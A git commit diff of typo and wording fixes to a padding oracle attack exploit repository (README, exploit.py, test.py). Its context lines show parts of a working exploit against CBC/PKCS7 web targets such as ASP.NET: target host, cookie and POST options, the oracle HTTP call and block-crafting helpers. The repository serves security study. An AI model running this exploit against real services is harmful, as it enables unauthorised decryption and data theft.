Merge pull request #3 from towynlin/editorial

Editorial changes

Author: towynlin

Diff for: README.md

@@ -1,8 +1,8 @@
 # Padding Oracle Attack
 
 An exploit for the [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding_oracle_attack). Tested against ASP.NET, works like a charm. The CBC  mode must use [PKCS7](https://en.wikipedia.org/wiki/Padding_%28cryptography%29#PKCS7) for the padding block.
-This is an implementation of this great article [Padding Oracle Attack](https://not.burntout.org/blog/Padding_Oracle_Attack/). Since the article is not very well formated and maybe unclear, I made an explanation in the readme. i advise you to read it if you want to understand the basics of the attack.
-This exploit allow block size of 8 or 16 this mean it can be use even if the cipher use AES or DES. You can find instructions to launch the attack [here](https://github.com/mpgn/Padding-Oracle-Attack#options).
+This is an implementation of this great article [Padding Oracle Attack](https://not.burntout.org/blog/Padding_Oracle_Attack/). Since the article is not very well formated and maybe unclear, I made an explanation in the readme. I advise you to read it if you want to understand the basics of the attack.
+This exploit allows block sizees of 8 or 16. This means it can be used if the cipher uses AES or DES. You can find instructions to launch the attack [here](https://github.com/mpgn/Padding-Oracle-Attack#options).
 
 I also made a test file `test.py`, you don't need a target to use it :)
 
@@ -116,14 +116,14 @@ Details required options:
 -l length of a block example: 8 or 16
 -u UrlTarget for example: ?/page=
 --host hostname example: google.fr
---error Error that the orcale give you for a wrong padding
+--error Error that the oracle gives you for a wrong padding
     example: with HTTP method: 200,400,500
              with DOM HTML   : "<h2>Padding Error</h2>"
 ```
 Optional options:
 ```bash
 --cookie Cookie parameter example: PHPSESSID=9nnvje7p90b507shfmb94d7
---method Default GET methode but can se POST etc
+--method Default GET method but can set POST etc
 --post POST parameter if you need example 'user':'value', 'pass':'value'
 ```
 
@@ -144,10 +144,10 @@ No problem, find these line and do what you have to do :)
 
 * Custom oracle response: 
 ```python
-####################################
-# CUSTOM YOUR RESPONSE ORACLE HERE #
-####################################
-''' the function you want change to adapte the result to your problem '''
+#######################################
+# CUSTOMIZE YOUR RESPONSE ORACLE HERE #
+#######################################
+''' The function you want change to adapt the result to your problem '''
 def test_validity(response,error):
     try:
         value = int(error)
@@ -165,9 +165,9 @@ def test_validity(response,error):
 
 * Custom oracle call (HTTP)
 ```python
-################################
-# CUSTOM YOUR ORACLE HTTP HERE #
-################################
+###################################
+# CUSTOMIZE YOUR ORACLE HTTP HERE #
+###################################
 def call_oracle(host,cookie,url,post,method,up_cipher):
     if post:
         params = urllib.urlencode({post})

Diff for: exploit.py

@@ -15,10 +15,10 @@
 from itertools import cycle
 from urllib.parse import urlencode
 
-####################################
-# CUSTOM YOUR RESPONSE ORACLE HERE #
-####################################
-""" the function you want change to adapte the result to your problem """
+#######################################
+# CUSTOMIZE YOUR RESPONSE ORACLE HERE #
+#######################################
+""" The function you want change to adapt the result to your problem """
 
 
 def test_validity(response, error):
@@ -30,16 +30,16 @@ def test_validity(response, error):
     except ValueError:
         pass  # it was a string, not an int.
 
-    # oracle repsonse with data in the DOM
+    # oracle response with data in the DOM
     data = response.read()
     if data.find(error.encode()) == -1:
         return 1
     return 0
 
 
-################################
-# CUSTOM YOUR ORACLE HTTP HERE #
-################################
+###################################
+# CUSTOMIZE YOUR ORACLE HTTP HERE #
+###################################
 def call_oracle(host, cookie, url, post, method, up_cipher):
     if post:
         params = urlencode({post})
@@ -56,13 +56,11 @@ def call_oracle(host, cookie, url, post, method, up_cipher):
     return conn, response
 
 
-# the exploit don't need to touch this part
-# split the cipher in len of size_block
 def split_len(seq, length):
     return [seq[i : i + length] for i in range(0, len(seq), length)]
 
 
-""" create custom block for the byte we search"""
+""" Create custom block for the byte we search"""
 
 
 def block_search_byte(size_block, i, pos, l):
@@ -75,7 +73,7 @@ def block_search_byte(size_block, i, pos, l):
     )
 
 
-""" create custom block for the padding"""
+""" Create custom block for the padding"""
 
 
 def block_padding(size_block, i):
@@ -153,7 +151,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
                         found = True
                         connection.close()
 
-                        # data analyse and insert in rigth order
+                        # data analyse and insert in right order
                         value = re.findall("..", bk)
                         valide_value.insert(0, value[size_block - (i + 1)])
 
@@ -238,7 +236,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
         "--length_block_cipher",
         required=True,
         type=int,
-        help="lenght of a block cipher: 8,16",
+        help="length of a block cipher: 8,16",
     )
     parser.add_argument("--host", required=True, help="url example: /page=")
     parser.add_argument("-u", "--urltarget", required=True, help="url example: /page=")
@@ -251,7 +249,7 @@ def run(cipher, size_block, host, url, cookie, method, post, error):
         "--cookie", help="Cookie example: PHPSESSID=9nnvje7p90b507shfmb94d7", default=""
     )
     parser.add_argument(
-        "--method", help="Type methode like POST GET default GET", default="GET"
+        "--method", help="HTTP method like POST GET default GET", default="GET"
     )
     parser.add_argument(
         "--post", help="POST data example: 'user':'value', 'pass':'value'", default=""

Diff for: test.py

@@ -52,7 +52,7 @@ def decrypt(enc, iv):
     return unpad(decipher.decrypt(enc))
 
 
-""" the function you want change to adapte the result to your problem """
+""" The function you want change to adapt the result to your problem """
 
 
 def test_validity(error):
@@ -67,7 +67,7 @@ def call_oracle(up_cipher, iv):
     return 200
 
 
-""" create custom block for the byte we search"""
+""" Create custom block for the byte we search"""
 
 
 def block_search_byte(size_block, i, pos, l):
@@ -80,7 +80,7 @@ def block_search_byte(size_block, i, pos, l):
     )
 
 
-""" create custom block for the padding"""
+""" Create custom block for the padding"""
 
 
 def block_padding(size_block, i):
@@ -93,8 +93,6 @@ def block_padding(size_block, i):
     return "00" * (size_block - (i + 1)) + "".join(l)
 
 
-# the exploit don't need to touch this part
-# split the cipher in len of size_block
 def split_len(seq, length):
     return [seq[i : i + length] for i in range(0, len(seq), length)]
 
@@ -116,7 +114,7 @@ def run(cipher, size_block):
 
     if len(cipher_block) == 1:
         print(
-            "[-] Abort there is only one block, i can't influence the IV. Tried a longer message"
+            "[-] Abort there is only one block. I can't influence the IV. Try a longer message."
         )
         sys.exit()